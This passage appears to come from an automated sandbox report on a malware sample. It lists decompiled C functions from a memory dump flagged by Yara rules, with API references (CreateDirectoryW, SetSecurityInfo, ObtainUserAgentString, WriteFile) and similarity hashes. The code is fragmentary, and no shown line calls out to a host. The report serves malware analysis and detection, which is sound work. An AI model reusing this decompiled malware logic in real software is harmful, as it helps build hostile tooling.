                                    				WCHAR* _v8;
                                    				char _v12;
                                    				char _v44;
                                    				char _v564;
                                    				char _v1084;
                                    				void* __esi;
                                    				void* _t23;
                                    				struct _SECURITY_ATTRIBUTES* _t25;
                                    				int _t27;
                                    				char _t32;
                                    				char _t38;
                                    				intOrPtr _t39;
                                    				void* _t40;
                                    				WCHAR* _t41;
                                    				void* _t54;
                                    				char* _t60;
                                    				char* _t63;
                                    				void* _t70;
                                    				WCHAR* _t71;
                                    				intOrPtr* _t73;
                                    
                                    				_t70 = __ecx;
                                    				_push(__ecx);
                                    				E000CB700(__edx,  &_v44, __eflags, __fp0);
                                    				_t52 = _t70;
                                    				if(E000CBB8D(_t70) == 0) {
                                    					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
                                    					_pop(_t54);
                                    					__eflags = _t23;
                                    					if(__eflags == 0) {
                                    						_t71 = E000C2C64( &_v1084, __eflags);
                                    					} else {
                                    						E000CB012(_t54,  &_v564); // executed
                                    						_t32 = E000C109A(_t54, 0x375);
                                    						_push(0);
                                    						_v12 = _t32;
                                    						_push( &_v44);
                                    						_t60 = "\\";
                                    						_push(_t60);
                                    						_push(_t32);
                                    						_push(_t60);
                                    						_push( &_v564);
                                    						_push(_t60);
                                    						_t71 = E000C92E5( &_v1084);
                                    						E000C85D5( &_v12);
                                    					}
                                    				} else {
                                    					_t38 = E000C109A(_t52, 0x4e0);
                                    					 *_t73 = 0x104;
                                    					_v12 = _t38;
                                    					_t39 =  *0xde684; // 0x27bf8f0
                                    					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                                    					_t78 = _t40;
                                    					if(_t40 != 0) {
                                    						_t41 = E000C109A( &_v564, 0x375);
                                    						_push(0);
                                    						_v8 = _t41;
                                    						_push( &_v44);
                                    						_t63 = "\\";
                                    						_push(_t63);
                                    						_push(_t41);
                                    						_push(_t63);
                                    						_t71 = E000C92E5( &_v564);
                                    						E000C85D5( &_v8);
                                    					} else {
                                    						_t71 = E000C2C64( &_v44, _t78);
                                    					}
                                    					E000C85D5( &_v12);
                                    				}
                                    				_v8 = _t71;
                                    				_t25 = E000CB269(_t71);
                                    				if(_t25 == 0) {
                                    					_t27 = CreateDirectoryW(_t71, _t25); // executed
                                    					if(_t27 == 0 || E000CB269(_t71) == 0) {
                                    						E000C861A( &_v8, 0xfffffffe);
                                    						_t71 = _v8;
                                    					}
                                    				}
                                    				return _t71;
                                    			}
























                                    APIs
                                    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectory
                                    • String ID:
                                    • API String ID: 4241100979-0
                                    • Opcode ID: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
                                    • Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
                                    • Opcode Fuzzy Hash: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
                                    • Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C5AFF(intOrPtr __edx, void* __fp0) {
                                    				short _v30;
                                    				short _v32;
                                    				short _v34;
                                    				short _v36;
                                    				intOrPtr* _t22;
                                    				intOrPtr _t23;
                                    				signed int _t30;
                                    				intOrPtr _t38;
                                    				intOrPtr* _t40;
                                    				intOrPtr _t44;
                                    				intOrPtr _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t47;
                                    				void* _t55;
                                    
                                    				_t55 = __fp0;
                                    				_t45 = __edx;
                                    				_t47 = 0;
                                    				_t22 = E000C8604(0x14);
                                    				_t38 =  *0xde688; // 0xf0000
                                    				_t46 = _t22;
                                    				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                                    					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                                    					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                                    					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                                    					_v30 = 0;
                                    					GetDriveTypeW( &_v36); // executed
                                    				}
                                    				 *_t46 = 2;
                                    				 *(_t46 + 4) = _t47;
                                    				_t23 =  *0xde688; // 0xf0000
                                    				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                                    				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                                    				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                                    				if(_t40 == 0) {
                                    					L9:
                                    					if(E000C2DCB() == 0) {
                                    						goto L11;
                                    					} else {
                                    						_t47 = _t47 | 0xffffffff;
                                    					}
                                    				} else {
                                    					_t45 =  *_t40;
                                    					_t30 = _t47;
                                    					if(_t45 == 0) {
                                    						goto L9;
                                    					} else {
                                    						_t44 =  *((intOrPtr*)(_t40 + 4));
                                    						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                                    							_t30 = _t30 + 1;
                                    							if(_t30 < _t45) {
                                    								continue;
                                    							} else {
                                    								goto L9;
                                    							}
                                    							goto L12;
                                    						}
                                    						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                                    							L11:
                                    							E000C4D6D(_t46, _t45, _t55);
                                    						} else {
                                    							goto L9;
                                    						}
                                    					}
                                    				}
                                    				L12:
                                    				E000CA39E();
                                    				E000CA39E();
                                    				return _t47;
                                    			}


















                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateDriveHeapType
                                    • String ID:
                                    • API String ID: 414167704-0
                                    • Opcode ID: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
                                    • Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
                                    • Opcode Fuzzy Hash: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
                                    • Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E000CBC7A(void* __ecx, void* __edx) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _t18;
                                    				intOrPtr _t19;
                                    				intOrPtr _t27;
                                    				intOrPtr _t30;
                                    				intOrPtr _t36;
                                    				intOrPtr _t38;
                                    				char _t39;
                                    
                                    				_t39 = 0;
                                    				_t38 =  *0xde674; // 0x1e0
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_t18 = E000C95E1(__ecx, 0x84b);
                                    				_push(0);
                                    				_v24 = _t18;
                                    				_push( &_v8);
                                    				_push(1);
                                    				_push(_t18);
                                    				_t19 =  *0xde68c; // 0x27bfab8
                                    				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                                    					_push( &_v16);
                                    					_push( &_v12);
                                    					_push( &_v20);
                                    					_t27 =  *0xde68c; // 0x27bfab8
                                    					_push(_v8);
                                    					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                                    						_push(_v12);
                                    						_t30 =  *0xde68c; // 0x27bfab8
                                    						_push(0);
                                    						_push(0);
                                    						_push(0);
                                    						_push(0x10);
                                    						_push(6);
                                    						_push(_t38); // executed
                                    						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                                    							_t39 = 1;
                                    						}
                                    					}
                                    					_t36 =  *0xde68c; // 0x27bfab8
                                    					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                                    				}
                                    				E000C85D5( &_v24);
                                    				return _t39;
                                    			}
















                                    APIs
                                    • SetSecurityInfo.ADVAPI32(000001E0,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: InfoSecurity
                                    • String ID:
                                    • API String ID: 3528565900-0
                                    • Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
                                    • Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
                                    • Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
                                    • Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E000CE450(void* __ecx, void* __edx) {
                                    				char _v8;
                                    				intOrPtr* _t5;
                                    				intOrPtr _t10;
                                    				intOrPtr* _t11;
                                    				void* _t12;
                                    
                                    				_push(__ecx);
                                    				_t5 =  *0xde6b0; // 0x26307f8
                                    				if( *_t5 == 0) {
                                    					_v8 = E000C95C7(0x2a7);
                                    					 *0xde788 = E000C91A6(_t6, 0);
                                    					E000C85C2( &_v8);
                                    					goto L4;
                                    				} else {
                                    					_v8 = 0x100;
                                    					_t10 = E000C8604(0x101);
                                    					 *0xde788 = _t10;
                                    					_t11 =  *0xde6b0; // 0x26307f8
                                    					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                    					if(_t12 == 0) {
                                    						L4:
                                    						return 0;
                                    					} else {
                                    						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
                                    					}
                                    				}
                                    			}









                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481
                                      • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AgentAllocateFreeObtainStringUser
                                    • String ID:
                                    • API String ID: 471734292-0
                                    • Opcode ID: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
                                    • Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
                                    • Opcode Fuzzy Hash: d64ad438d1f21712e29717cacfc5ecf1b2ada0c73ac6bad4d088b33bcd025bf9
                                    • Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _t13;
                                    				void* _t21;
                                    				void* _t23;
                                    				void* _t26;
                                    
                                    				_t23 = __ecx;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_t26 = 0;
                                    				_v12 = __ecx;
                                    				_t21 = __edx;
                                    				if(_a4 == 0) {
                                    					L3:
                                    					_t13 = 1;
                                    				} else {
                                    					while(1) {
                                    						_v8 = _v8 & 0x00000000;
                                    						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                    							break;
                                    						}
                                    						_t26 = _t26 + _v8;
                                    						_t23 = _v12;
                                    						if(_t26 < _a4) {
                                    							continue;
                                    						} else {
                                    							goto L3;
                                    						}
                                    						goto L4;
                                    					}
                                    					_t13 = 0;
                                    				}
                                    				L4:
                                    				return _t13;
                                    			}










                                    APIs
                                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
                                    • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
                                    • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
                                    • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CA5F7(WCHAR* __ecx, long __edx) {
                                    				intOrPtr _t6;
                                    				long _t12;
                                    				void* _t13;
                                    
                                    				_t12 = __edx;
                                    				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                    				if(_t13 != 0xffffffff) {
                                    					if(_t12 == 4) {
                                    						_t6 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                                    					}
                                    					return _t13;
                                    				}
                                    				return 0;
                                    			}







                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
                                    • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
                                    • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
                                    • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E000CA63B(WCHAR* __ecx) {
                                    				signed int _t5;
                                    
                                    				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                    				_t2 = _t5 + 1; // 0x1
                                    				asm("sbb ecx, ecx");
                                    				return _t5 &  ~_t2;
                                    			}





                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,000CA6C9,00000000,00000400,00000000,000CF8B5,000CF8B5,?,000CFA56,00000000), ref: 000CA64F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
                                    • Instruction ID: 1068c18890d774138d04a37c6931822a42b8c5c396f3f8334ead4a3a4bc70c88
                                    • Opcode Fuzzy Hash: dc10efbfdf4d0596efad4b309aca95c70faf63e936817f64c8de1a56b9c95d3c
                                    • Instruction Fuzzy Hash: 73D012B13A0100BEFB2C9B34CD9AF72339CD714701F22025C7A06EA0E1CA69E9048720
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C8604(long _a4) {
                                    				void* _t2;
                                    
                                    				_t2 = RtlAllocateHeap( *0xde768, 8, _a4); // executed
                                    				return _t2;
                                    			}





                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
                                    • Instruction ID: 67f2f94d9d2d1e8656920a461522efd37944946b4c73135d0d1b7f49406c2d62
                                    • Opcode Fuzzy Hash: f6f2957317a3188cc199931cfeb9fc39ac0a0652bc30cfb8c835e5094af43c40
                                    • Instruction Fuzzy Hash: CFB09235085A08BBFEC12B81ED05E843F69EB04655F008012FA08080708A6664649BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CB269(WCHAR* __ecx) {
                                    
                                    				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                    			}




                                    APIs
                                    • GetFileAttributesW.KERNELBASE(00000000,000C4E7B), ref: 000CB26F
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
                                    • Instruction ID: e31c5f2542f69ce23b2b76098601bb74ace79624de71742bfcf3cc401eb3d774
                                    • Opcode Fuzzy Hash: 66e348a4375615d6ddbf5efb008cd9aa4b82378b74d2163687bee5487349325c
                                    • Instruction Fuzzy Hash: E5B092B62210404BCA186B38998484D32909B1C2313220759B033CA0E1D624C8509A10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C85EF() {
                                    				void* _t1;
                                    
                                    				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                    				 *0xde768 = _t1;
                                    				return _t1;
                                    			}





                                    APIs
                                    • HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID:
                                    • API String ID: 10892065-0
                                    • Opcode ID: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
                                    • Instruction ID: 97f405ab2dff3ce32c07cefcd6e371dde968c6b9a07cde9570e7adef5d1870a3
                                    • Opcode Fuzzy Hash: 1adbe088cf2c0bd30e5e52d93837b567d357e8130d197641d92511886dae2574
                                    • Instruction Fuzzy Hash: 3EB01270686700A6F3D03B209C06B003B50A300B06F304007FF045C1D0CBB41004CF34
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E000CF9BF(void* __edx) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _t26;
                                    				char _t27;
                                    				intOrPtr _t29;
                                    				void* _t31;
                                    				void* _t36;
                                    				char _t38;
                                    				intOrPtr _t39;
                                    				char _t42;
                                    				intOrPtr _t51;
                                    				intOrPtr _t52;
                                    				intOrPtr* _t63;
                                    				intOrPtr _t66;
                                    				char* _t67;
                                    				intOrPtr _t69;
                                    				char _t78;
                                    				void* _t81;
                                    				void* _t82;
                                    
                                    				_t26 =  *0xde654; // 0x27bfd30
                                    				_t27 = E000C8604( *((intOrPtr*)(_t26 + 4)));
                                    				_v12 = _t27;
                                    				if(_t27 != 0) {
                                    					_t63 =  *0xde654; // 0x27bfd30
                                    					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                                    						E000C86E1(_t27,  *_t63, 0x400);
                                    						_v8 = 0;
                                    						_t36 = E000C109A(_t63, 0x34a);
                                    						_t66 =  *0xde688; // 0xf0000
                                    						_t72 =  !=  ? 0x67d : 0x615;
                                    						_t38 = E000C95E1(_t66,  !=  ? 0x67d : 0x615);
                                    						_push(0);
                                    						_push(_t36);
                                    						_t67 = "\\";
                                    						_v24 = _t38;
                                    						_push(_t67);
                                    						_push(_t38);
                                    						_t39 =  *0xde688; // 0xf0000
                                    						_push(_t67);
                                    						_v20 = E000C92E5(_t39 + 0x1020);
                                    						_t42 = E000CA6A9( &_v8, _t41,  &_v8); // executed
                                    						_v16 = _t42;
                                    						E000C85D5( &_v24);
                                    						E000C85D5( &_v20);
                                    						_t73 = _v16;
                                    						_t82 = _t81 + 0x3c;
                                    						_t69 = _v8;
                                    						if(_v16 != 0 && _t69 > 0x400) {
                                    							_t51 =  *0xde654; // 0x27bfd30
                                    							_t52 =  *((intOrPtr*)(_t51 + 4));
                                    							_t53 =  <  ? _t69 : _t52;
                                    							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                                    							E000C86E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                                    							_t69 = _v8;
                                    							_t82 = _t82 + 0xc;
                                    						}
                                    						E000C861A( &_v16, _t69);
                                    						E000C861A( &_v20, 0xfffffffe);
                                    						_t27 = _v12;
                                    						_t81 = _t82 + 0x10;
                                    						_t63 =  *0xde654; // 0x27bfd30
                                    					}
                                    					_t78 = 0;
                                    					while(1) {
                                    						_t29 =  *0xde688; // 0xf0000
                                    						_t31 = E000CA77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                                    						_t81 = _t81 + 0xc;
                                    						if(_t31 >= 0) {
                                    							break;
                                    						}
                                    						Sleep(1);
                                    						_t78 = _t78 + 1;
                                    						if(_t78 < 0x2710) {
                                    							_t27 = _v12;
                                    							_t63 =  *0xde654; // 0x27bfd30
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					E000C861A( &_v12, 0);
                                    				}
                                    				return 0;
                                    			}


























                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,000CF8B5,?,?,?,000CFCB9,00000000), ref: 000CFAEC
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapSleep
                                    • String ID:
                                    • API String ID: 4201116106-0
                                    • Opcode ID: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
                                    • Instruction ID: 0cbca30703809a2c9c0d4c860327d646f2255841ca950a665f446f2c8c25f923
                                    • Opcode Fuzzy Hash: 89e5b95cc690eaffc7b1ec14aca8cca0db16b86c99a9d2d3fdf60401a230e78e
                                    • Instruction Fuzzy Hash: F0417FB2A00105ABEB04EBA4CD85FAEB7BDEB54304B14407EF905DB242DB39DA05CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E000C896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                                    				char _v8;
                                    				WCHAR* _v12;
                                    				signed int _v16;
                                    				WCHAR* _v20;
                                    				short _t30;
                                    				short _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t43;
                                    				intOrPtr _t45;
                                    				short _t49;
                                    				void* _t52;
                                    				char _t71;
                                    				WCHAR* _t72;
                                    
                                    				_v16 = _v16 & 0x00000000;
                                    				_t71 = 0;
                                    				_v12 = __ecx;
                                    				_t49 = __edx;
                                    				_v8 = 0;
                                    				_t72 = E000C8604(0x448);
                                    				_v20 = _t72;
                                    				_pop(_t52);
                                    				if(_t72 != 0) {
                                    					_t72[0x21a] = __edx;
                                    					_t72[0x21c] = _a8;
                                    					lstrcpynW(_t72, _v12, 0x200);
                                    					if(_t49 != 1) {
                                    						_t30 = E000C8604(0x100000);
                                    						_t72[0x212] = _t30;
                                    						if(_t30 != 0) {
                                    							_t69 = _a4;
                                    							_t72[0x216] = 0x100000;
                                    							if(_a4 != 0) {
                                    								E000C87EA(_t72, _t69);
                                    							}
                                    							L16:
                                    							return _t72;
                                    						}
                                    						L7:
                                    						if(_t71 != 0) {
                                    							E000C861A( &_v8, 0);
                                    						}
                                    						L9:
                                    						_t33 = _t72[0x218];
                                    						if(_t33 != 0) {
                                    							_t38 =  *0xde684; // 0x27bf8f0
                                    							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                                    						}
                                    						_t73 =  &(_t72[0x212]);
                                    						if(_t72[0x212] != 0) {
                                    							E000C861A(_t73, 0);
                                    						}
                                    						E000C861A( &_v20, 0);
                                    						goto L1;
                                    					}
                                    					_t43 = E000CA6A9(_t52, _v12,  &_v16); // executed
                                    					_t71 = _t43;
                                    					_v8 = _t71;
                                    					if(_t71 == 0) {
                                    						goto L9;
                                    					}
                                    					if(E000C8815(_t72, _t71, _v16, _a4) < 0) {
                                    						goto L7;
                                    					} else {
                                    						_t45 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                                    						_t72[0x218] = _t72[0x218] & 0x00000000;
                                    						E000C861A( &_v8, 0);
                                    						goto L16;
                                    					}
                                    				}
                                    				L1:
                                    				return 0;
                                    			}

















                                    APIs
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000C89B9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeaplstrcpyn
                                    • String ID:
                                    • API String ID: 680773602-0
                                    • Opcode ID: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
                                    • Instruction ID: f7af5643379fb798a10d9983aff7c2aee7eeb5d10f7fdca91578ae01a6c37180
                                    • Opcode Fuzzy Hash: ea4ba919963f8db97ca774dc6b51950c5f4ee3be6646b617ec81c8140057174e
                                    • Instruction Fuzzy Hash: 96318172A04304EFEB249BA5D845F9EB7E9EF44760F64842EF50597182DF30AA00875D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E000CE2C6(void* __fp0, intOrPtr _a4) {
                                    				char _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				void* _v28;
                                    				char _v32;
                                    				char _v544;
                                    				signed int _t40;
                                    				intOrPtr _t41;
                                    				intOrPtr _t48;
                                    				intOrPtr _t58;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				void* _t70;
                                    				signed int _t73;
                                    				void* _t75;
                                    				void* _t77;
                                    
                                    				_t77 = __fp0;
                                    				_v20 = 0;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				_t66 =  *0xde6b4; // 0x27bfa98, executed
                                    				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                                    				if(_t40 == 0) {
                                    					_t73 = 0;
                                    					if(_v20 <= 0) {
                                    						L9:
                                    						_t41 =  *0xde6b4; // 0x27bfa98
                                    						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                                    						return 0;
                                    					}
                                    					do {
                                    						_v16 = 0;
                                    						_v12 = 0;
                                    						_t48 =  *0xde68c; // 0x27bfab8
                                    						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                                    						_t70 = E000C8604(_v16 + 1);
                                    						if(_t70 != 0) {
                                    							_v12 = 0x200;
                                    							_push( &_v32);
                                    							_push( &_v12);
                                    							_push( &_v544);
                                    							_push( &_v16);
                                    							_push(_t70);
                                    							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                                    							_t58 =  *0xde68c; // 0x27bfab8
                                    							_push(0);
                                    							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                                    								E000C4905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                                    								_t75 = _t75 + 0xc;
                                    								Sleep(0xa);
                                    							}
                                    						}
                                    						_t73 = _t73 + 1;
                                    					} while (_t73 < _v20);
                                    					goto L9;
                                    				}
                                    				return _t40 | 0xffffffff;
                                    			}






















                                    APIs
                                    • Sleep.KERNELBASE(0000000A), ref: 000CE394
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
                                    • Instruction ID: d27438c55f7a9eb286fce9ed97ab300969749f514a42abca27bfc32afb8dea28
                                    • Opcode Fuzzy Hash: b630c363af7e2f7ad05f24635a6b5b40618a96c512f4d6a81e662aa74840ab76
                                    • Instruction Fuzzy Hash: 1A310DB5900158AFDB11DF94CD88EEFBBBCEB08350F1142AAB911E7291D730AE018B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
